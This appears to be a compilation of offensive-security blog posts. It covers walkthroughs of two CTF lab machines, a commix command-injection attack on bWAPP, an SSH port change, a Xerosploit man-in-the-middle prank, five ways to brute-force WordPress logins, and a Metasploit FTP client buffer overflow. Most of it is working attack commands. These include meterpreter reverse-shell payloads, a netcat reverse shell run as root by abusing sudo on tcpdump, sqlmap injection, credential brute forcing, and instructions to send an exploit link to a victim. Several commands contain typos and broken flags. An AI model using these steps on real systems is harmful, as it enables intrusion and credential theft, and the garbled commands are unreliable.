Note: we have cracked the MD5 value of password that resulted in 32admin but here is is no use of 32. The password is admin.

It logged in but to upload the malicious code you have to follow the path is: file manage > includes > work.  Here you have to upload your php code.

To generate the code go to the terminal in Kali and type:

Msfvenom –p php/meterpreter/reverse-tcp lhost-192.168.110.128 lport=8443 –f raw

Copy <? to die(); and save it in a .php document.

Before running the file goes to mestaspoit and start multi/handler.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.110.128

set lport 8443

exploit

It will give you the meterpreter session and then type the combination of following commands to reach terminal :

shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

id

Next type :

/var/www/html2/oscommerce/includes/work

Still we haven’t reached root but we found blumbergh, let’s see what privileges it has.

sudo –l

Ok. So it saya that it can rum a tcpdump file as root. That’s interesting. To manipulate tcpdump I need to run a set of following comands:

Echo $’id\n/bin/netcat 192.168.110.128 443 –e /bin/bash’ > /tmp/.test

Chmod +x /tmp/.test

Sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root

Tough part is over! Now I just need to run netcat :

nc –nlvp 443

Let’s confirm if we have reached root or not and if yes, let’s see what it has to offer :

id

cd /root

ls

There ia flag.py file in /root. So no waiting. Lets capture the flag.

python .flag.py

HURRAYYYY!!!! The flag has been captured!!! Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Breach 2.1 VM (CTF Challenge) appeared first on Hacking Articles.

Acid reloaded is the 2nd VM of the Acid series of Boot2Root CTF exercise. It is created by Avinash Thappa. To capture the flag, first we have to gain the root access that means escalating administrator privileges.

You can download this VM from: https://www.vulnhub.com/entry/acid-reloaded,127/

WalkThrough

As always start by finding our target

netdiscover

This tells us that our target is 192.168.1.10. Now is time to scan with nmap.

nmap –p- -A 192.168.1.10

The result of nmap shows us that only port 22 is open with the service of SSH. Let’s check out this 22 port.

ssh 192.168.1.10

Checking out port 22 hints us that we should use Port Knocking technique.

nmap –r –Pn –p 3,2,1 192.168.1.10

Let’s scan with nmap again.

nmap –p- -A 192.168.1.10

Port knocking helped us to open port 33447 on which the service of HTTP was redirected. Now open the target IP on browser using this port.

A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It’s time to use nikto.

nikto –h 192.168.1.10:33447

Now nikto reveals that /bin/ might be interesting as it might have a shell system. No harm in checking it out in browsing so let’s do that.

And it’s a log in portal. Now let’s check its page source.

In the page source there is a directory called: includes/validation.php. I decided to check it out.

Alas! I could not find anything on it. So decided to use DirBuster to find out about directories. In the DirBuster give the URL and for wordlist use medium 1.0 wordlist.

And then click on Start button and it will start finding directories.

I checked every directory related to bin and only /bin/dashboard.php was useful. When I opened it in the browser, I found nothing useful so I looked in to the page source and even that proved to be non-useful.

When nothing helped I decided to capture its cookies using BurpSuite. To capture the cookies using BurpSuite, set proxy and then turn on the interception and then simply reload the page. When the cookies are captured just add the following below the Host.

Referer : http://192.168.1.10:33447/bin/includes/validation.php

And now as soon as you will hit the forward button it will automatically log in.

On the page it says to click and when you do that it will redirect to the following page.

There was nothing on the redirected page or its page source. So decided it to use SQLMap.

sqlmap –u “192.168.1.10:33447/bin/l33t_haxor.php?id=1” –dbs –tamper=space2comment

It shows us the name of the table i.e. UB3R/strcpy.exe

Now I have a name o the table so I decided open it in URL.

When I opened it in the browser, a dialogue box opened and asked to save a file and so I did. Now I used foremost tool to know a bit about the file.

Foremost tool is a forensic tool which is used to recover files using their headers and footers.

Foremost strcpy.exe

As soon as you will run the above command a folder is created with the name of output. Let’s check out this folder.

cd output/

ls

There is a text file in the folder with the name of audit, I decided to read it through cat command.

Cat audit.txt

There is a .rar which I decided to unrar.

unrar x 00000213.rar

On unzipping there are two files that has been extracted i.e. acid.txt and lol.jpg. I decided to read acid.txt

cat acid.txt

This .txt tells us that we are on right path. So ofcourse next I opened lol.jpg

exiftool lol.jpg

But found nothing. So I unzipped it.

unrar e lol.jpg

Unzipping the lol,jpg gave me two files again, one was hint.txt and another Avinash.contact. So I opened hint.txt which told me to go with Avinash.contact, so I next opened.

cat Avinash.contact

There was base64 code given in the file with some random words like avinash, person, etc. So I saved these random words in a text file and decoded the base64 code which turned to be NooB@123.

And then applied brute force on SSH using the text file I just created with random words because one of them could be username and other could be password. And for that open metasploit and type:

use auxiliary/scanner/ssh/ssh-login

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

And it gave us makke:NooB@123 as username and password respectively. And so I logged in with SSH.

ssh makke@192.168.1.10

Give the password when asked. And when I logged in I checked kernel’s version and tried to download its exploit but it didn’t happen. All the options for downloading were blocked so started exploring.

So I directly went for /bin.

cd /bin

ls

In /bin, there was files called overlayfs. This is a famous exploit so I executed it

./overlayfs

id

ls –la

And then fortunately there was a flag.txt.

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack Acid Reloaded VM (CTF Challenge) appeared first on Hacking Articles.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

Very first you need to setup bWAPP lab in your XAMPP or WAMP server, for this you can visit to my previous article web Pentest lab setup using bwapp here.

Now I m going to perform os command injection attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

 My task is to bypass all three security level in bWAPP through os command injection.

 Let start!

 Set security level: low

 Look at below image I have set the security level low, from option choose you bug select os command injection now and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

 To capture the cookie of bWAPP click on proxy option then click to inception is on button, come back to bWAPP and now click to DNS.

 As you can see I have capture the cookie in burp suite.

Open the terminal in kali Linux and type the commix command.

From fetched data under burp suite copy referrer, cookie and target use this in the following command

 commix –url=”http://192.168.1.103:81/bWAPP/commandi.php” –cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0″ –data=target=”192.168.1.103&form=submit”

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful commix provided a commix os shell

Commix (os_shell) > syseteminfo

Set security level: medium

Look at below image now I have set the security level medium, from option choose you bug select os command injection now and click on hack.

Repeat the process again as above, Type the IP in the DNS lookup field and just after that start the burp suite.

Click to inception is on, come back to bWAPP and now click to DNS. As you can see I have capture the cookie for medium level in burp suite.

From fetched data under burp suite copy referrer, cookie and target use this in the following command.

 commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=1″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful in medium security and again commix provided a commix os shell.

Commix (os_shell) > ipconfig

Set security level: high

After achieving os shell of low and medium my next mode is high security, now I m trying to bypass this level by repeating same process once again.

 Set security high, choose your bug os command injection and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=2″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell. We have successfully bypass high level also with the same process.  

Commix (os_shell) > systeminfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post bWAPP Command Injection Exploitation using Commix (Bypass All Security) appeared first on Hacking Articles.

In this article I am going to perform how to use port forwarding in a system which is a process that redirects a communication request from a specific port to another port or host. It is basically allows an outside computer to connect to a computer in a private local area network. Some commonly done port forwarding includes forwarding port 22 for SSH access, and forwarding port 80 for web servers. The major advantage is that it provides security to your private network and secure communication.

Requirement: Kali Linux

Let start!!

Open terminal and type following command to install openssh-server in your system.

apt-get install open-server

After installing the application we need to start this service in our computer which will start SSH service for communication further we have to check the status of service is running or stop.

service ssh start

service ssh status

Yes, SSH service is active and you can see the proper running status with the time and date. 

As we know port 22 is use for ssh and here server listening on port 22.

If I want to check whether the port 22 open or close I will use nmap tool to scane the host using basic command.

SCAN YOUR HOST

 nmap 192.168.0.103

From the result of nmap scan I found port 22 open under service ssh .

Port 22 is badly affected by DDOS attack; if attacker found port 22 open for ssh they will start attacking on server. For security purpose administrator uses port forwarding techniques.

Let me show how to forward a specific port to another port.

PORT FORWARD TECHNIQUE

In kali linux open file sshd_config from computer>etc>ssh>ssd_config

Please look at line no.3 here protocol is listening for port 22 and now just replace 22 from1923 and save the file without changing path.

service ssh restart

So now protocol is listening on port 1923 in place of 22. Let me confirm this with nmap scan.

USE NMAP

nmap -p 1-65535 192.168.0.103

Now if anybody else will scan your ip he/she will have no idea that ssh service is running on port 1923 because from result it is showing 1923 is open under spice service.

Nmap basic scan is failed because we are not getting the proper result from this basic scan. If you are having a good knowledge of Nmap scan then use advances command.

nmap -p – -A  192.168.0.103

Aggressive scan is successful , this scan penetrate under port, protocol and service as you can see port 1923 is open for ssh service.

USE TELNET

Same result can be found under telnet when you connect the host with port no. 1923.

telnet 192.168.0.103 1923

so if you found any port open just try to connect with telnet and you will get result which service is running on that perticular port. Look at the image result is very clear that port 1923 is listening for ssh.

USE NETCAT

Same purpose using netcat you will able to found current service for which 1923 is open.

nc 192.168.0.103 1923

For Windows Users

First download openssh Tool From here and install in your pc

This entire task can be performed under windows system. check whether the port 22 open or close again use Nmap scan

nmap 192.168.0.103

From the result of Nmap scan I found port 22 open under service ssh.

open file sshd_config from my computer>local Disk(C:)>program files>OpenSSH>etc>ssd_config

Here protocol is listening for port 22 and now just replace 22 from3221 and save the file.

So now protocol is listening on port 3221 in place of 22.

Now open command prompt and type following command to restart the ssh service in your system.

C:\WINDOWS\SYSTEM32>net stop opensshd

C:\Users\RAJ>net start opensshd

Let me confirm this with Nmap scan.

nmap -A 192.168.0.103

It is clear from aggressive scan SSH is running on port 3221 instead of port 22. In this way we can breach port forwarding also.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Secure SSH Port using Port Forwarding (Beginner Guide) appeared first on Hacking Articles.

 Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow realizing efficient attacks, and also allows carrying out denial of service attacks and port scanning. Powered by bettercap and Nmap

For more detail read previous article from here.

In this article I am going to use yplay attack which will play background sound in victim browser.

 Let start!!

 Requirement: kali Linux & xerosploit tool

 First you need to download xerosploit from github or you can visit to above link. I have already downloaded it in my tool folder.

Open terminal and start xerosploit tool ./xerosploit.py

This tool is very easy to use and provide complete information as you can see I have detail of my network configuration which will help me for selecting target in my network; after the tool starts it will ask to type help to view its command for attack. Go with this comment and type help.

 help

 In this grid we have list of commands for our attack and we are going for man in middle attack so I will choose scan command in my next step for scanning the whole network.

Scan

 This command will scan complete network and found devices on your network.

There are so many hosts in this network; you have to choose your target from given result. I am going to select 192.168.1.19 for man in middle attack.

192.168.1.19

 In next comment it will ask for module you want to load for man in middle attack. Go with this comment and type help.

Look at the list of modules and I would select yplay for modules which will play you tube videos as background sound in all web pages when victim will search for any web site in his/her browser. Open your browser and choose your favorite video in YouTube which you want to play in background in victim’s browser.

If video having any advertisement then skip that and select id from url. Look at image as I have selected the video id and copy it. Come back to xerosploit.

Yplay

 To execute yplay module for attack type run.

Run

 Insert you tube video ID which you have copy above from url in next step.

 yplay ➮ Wd2B8OAotU8

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Play Youtube videos as background sound in Remote PC using Xerosploit appeared first on Hacking Articles.

Brute force attack using Burp Suite

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now open the WordPress in your pc and it will ask you the username and password. Here, before giving username and password start burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off button.

When you turn on the interception then type any password of your predictions so that the burp suite can capture it. Look at image please notice the last line in fetched data it is show that I tried to login by type admin:admin as username and password respectively.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab without disturbing data click on clear button on right side of frame.

Now select the following as I have selected in the image and click on add button on the right side of frame. This will configure the position where payloads will be inserted into the base request.

Select the type of attack to determine the way in which payload are assigned to payload positions. I will choose cluster bomb as the number of payload set is depend upon attack type and we are having 2 payload positions. Click on start attack.

Click on payload set which will show two numeric numbers 1 and 2 select number 1 for first payload position. Further click on load button in payload option and configure your simple list string that will use as payload or you can add path of any dictionary username only. Similarly select number 2 for another payload position. Add path of any dictionary having password only. Click on start attack.

Now brute attack will match the combination of both payload and try to login in with username and password.

When attack will finished you would get the sure credential by checking status and length which would be different from rest of combination.

From result user:bitnami is username and password respectively.

Brute force attack using wpscan

WPScan is a black box vulnerability scanner for WordPress which is already installed by default in Kali Linux. For WordPress brute force you need a good dictionary or can make your own dictionary for attack.

ruby ./wpscan.rb –url 192.168.1.14 – wordlist /root/Desktop/pass.txt –username user

In this brute force attack I have just added wordlist for password. From result user:bitnami is login and password respectively.

Brute force attack using metasploit

This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module, it will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4

msf auxiliary(wordpress_login_enum) > set rport 80

msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt

msf auxiliary(wordpress_login_enum) > exploit

 WordPress brute force successful for login user:bitnami  as username and password.

Brute force attack using OWASP ZAP

Zap is an easy to use integrated penetration testing tool for finding the vulnerabilities in web application. Now we will use this tool for brute force attack and the whole process is same as burp suite.

Start OWASP ZAP and turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings. Select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

 Now once again open the WordPress in your pc and it will predict the username and password.

It will capture the data as you can see I have login with user as username and password as password. You can see it in the Request section of the tool select the character which you have entered in the page before. Therefore I will select only password from fetched data then use right click for fuzz option.

When you click on fuzz a new window ‘fuzzer’ will get open, now you have to click on add button on left of frame it will open a new window add payload. Click on select and choose your dictionary for attack.

Again click on add button and then click on start fuzzer.

After starting fuzzing again a new screen will open click on option button click to depth first radio button for payload replacement strategy. Select the check box of follow redirects and click to start fuzzing.

When attack will finished you would get the sure credential by checking state and size response header which would be different from rest of combination.

From result bitnami is password for login user.

Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open Kali terminal type following Nmap command

 nmap –sV – script http-wordpress-brute – script-args ‘userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true’ 192.168.1.17

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 5 ways to Brute Force Attack on WordPress Website appeared first on Hacking Articles.

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

 Exploit Targets

WinaXe 7.7 FTP client

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/winaxe_server_ready

msf exploit (winaxe_server_ready)>set lhost 192.168.0.106

msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106

msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp

msf exploit (winaxe_server_ready)>exploit

Now send the link to the victim when victim, enter in connection details and wait for the FTP connection WinaXe ftp. You will get victim meterpreter session.

The post Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow appeared first on Hacking Articles.